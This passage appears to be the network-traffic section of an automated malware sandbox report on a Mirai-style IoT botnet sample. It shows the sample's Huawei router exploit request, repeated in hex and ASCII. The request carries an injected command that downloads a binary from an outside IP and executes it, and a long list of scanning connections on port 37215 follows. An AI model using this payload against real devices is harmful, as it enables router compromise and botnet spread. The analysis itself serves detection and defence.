78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.194.220.138:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.129.185.138:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.123.149.9:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.62.1.90:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.112.115.89:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.202.50.139:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.11.13.7:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.36.42.1:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.244.193.228:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.74.247.138:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.187.57.235:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.210.230.249:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.234.117.84:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.117.212.203:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.176.178.83:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.247.211.201:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.42.75.14:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.231.41.52:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.91.37.13:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.37.33.113:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.132.177.169:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.183.175.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.217.222.162:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.236.76.55:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.61.0.6:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.64.206.233:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.91.107.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.31.10.235:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.183.242.228:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.15.200.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.46.107.246:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.189.124.95:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.81.15.215:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.219.198.26:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.200.210.19:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.150.76.166:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.165.94.63:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.71.29.249:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.231.133.250:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.116.163.144:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.40.16.244:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.175.250.254:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.247.184.78:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.246.16.10:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.120.247.28:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.55.54.239:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.217.9.63:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.67.207.10:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.221.143.1:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.167.25.235:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.64.210.32:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.22.196.238:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.24.24.220:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.127.46.51:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.189.156.143:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.74.65.74:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.232.181.105:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.207.197.20:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.52.132.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.102.173.229:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.11.84.254:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.237.207.183:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.160.102.78:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.109.44.29:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.1.38.94:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.86.8.71:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.36.210.243:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.132.226.158:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.87.223.148:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.140.231.217:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.238.79.142:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.234.252.94:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.87.7.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.58.92.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.1.46.227:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.26.139.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.119.108.199:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.14.139.116:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.48.246.215:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.192.146.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.49.208.246:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.89.4.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.64.80.189:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.6.104.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.136.35.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.190.213.70:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.175.73.180:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.174.254.231:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.200.5.69:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.165.209.59:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.118.33.220:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.187.70.184:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.105.221.44:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.78.110.154:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.60.227.231:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.174.98.230:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.158.209.77:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.69.218.114:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.236.123.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.38.239.13:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.203.96.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.200.230.140:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.119.7.107:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.211.216.150:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.156.128.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.232.224.74:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.105.177.55:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.85.119.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.125.1.227:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.111.34.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.39.226.93:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.243.190.231:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.144.246.61:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.45.212.181:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.134.75.92:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.219.244.235:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.152.20.209:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.58.16.182:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.185.238.73:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.60.153.134:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.21.145.210:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.131.216.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.154.113.26:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.183.114.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.217.226.146:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.43.133.249:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.244.220.9:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.34.108.178:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.233.144.33:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.150.237.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.179.217.118:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.36.13.125:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.132.20.237:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.254.171.220:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.96.30.41:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.112.22.104:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.140.127.28:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.221.12.122:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.118.100.2:37215
